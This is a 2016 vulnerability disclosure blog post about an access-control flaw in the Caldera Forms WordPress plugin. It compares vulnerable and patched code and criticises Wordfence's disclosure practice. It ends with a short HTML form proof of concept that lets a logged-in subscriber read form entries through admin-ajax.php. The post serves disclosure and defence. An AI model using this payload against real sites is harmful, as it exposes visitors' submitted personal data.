Login
25 May 2016

Protecting You Against Wordfence’s Bad Practices: Sensitive Data Exposure Vulnerability in Caldera Forms

Wordfence is putting WordPress website at risk by disclosing vulnerabilities in plugins with critical details needed to double check their work missing, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities to try to limit the damage Wordfence’s practice could cause.

Wordfence describes the vulnerability in Caldera Forms version 1.3.5.2 as “This vulnerability allows an attacker to gain access to potentially sensitive data that has been captured by a Caldera Form.”

The relevant change in the next version was to restrict certain AJAX functions to Administrator level users in the file /classes/admin.php.

Code in 1.3.5.2:

96
97
98
99
100

add_action("wp_ajax_toggle_form_state", array( $this, 'toggle_form_state') );
add_action("wp_ajax_browse_entries", array( $this, 'browse_entries') );		
add_action("wp_ajax_save_cf_setting", array( $this, 'save_cf_setting') );
add_action("wp_ajax_cf_dismiss_pointer", array( $this, 'update_pointer') );
add_action("wp_ajax_cf_bulk_action", array( $this, 'bulk_action') );

Code in 1.3.5.3:

96
97
98
99
100
101
102

if( current_user_can( Caldera_Forms::get_manage_cap( 'admin' ) ) ) {
	add_action( "wp_ajax_toggle_form_state", array( $this, 'toggle_form_state' ) );
	add_action( "wp_ajax_browse_entries", array( $this, 'browse_entries' ) );
	add_action( "wp_ajax_save_cf_setting", array( $this, 'save_cf_setting' ) );
	add_action( "wp_ajax_cf_dismiss_pointer", array( $this, 'update_pointer' ) );
	add_action( "wp_ajax_cf_bulk_action", array( $this, 'bulk_action' ) );
}

Wordfence’s description notably doesn’t mention that the attacker needs to be logged in to WordPress to exploit this, which severely limits the severity of the vulnerability.

The plugin developer also added the following code to check nonce’s to the functions update_pointer(), save_cf_setting(), and browse_entries():

self::verify_ajax_action();

Proof of Concept

The following proof of concept will show the entries for a form.

Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress and “[form id]” with the ID of the gallery you want to view the entries for (the form id can be found on the form’s page on the frontend).

<html>
 <body>
 <form action="http://[path to WordPress]/wp-admin/admin-ajax.php"; method="POST">
 <input type="hidden" name="action" value="browse_entries" />
 <input type="hidden" name="form" value="[form id]" />
 <input type="submit" value="Submit" />
 </form>
 </body>
</html>

No related posts.

Leave a Reply

Your email address will not be published.